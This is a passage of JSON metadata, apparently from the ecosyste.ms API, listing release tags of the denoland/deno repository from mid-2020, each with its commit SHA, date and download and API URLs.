.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2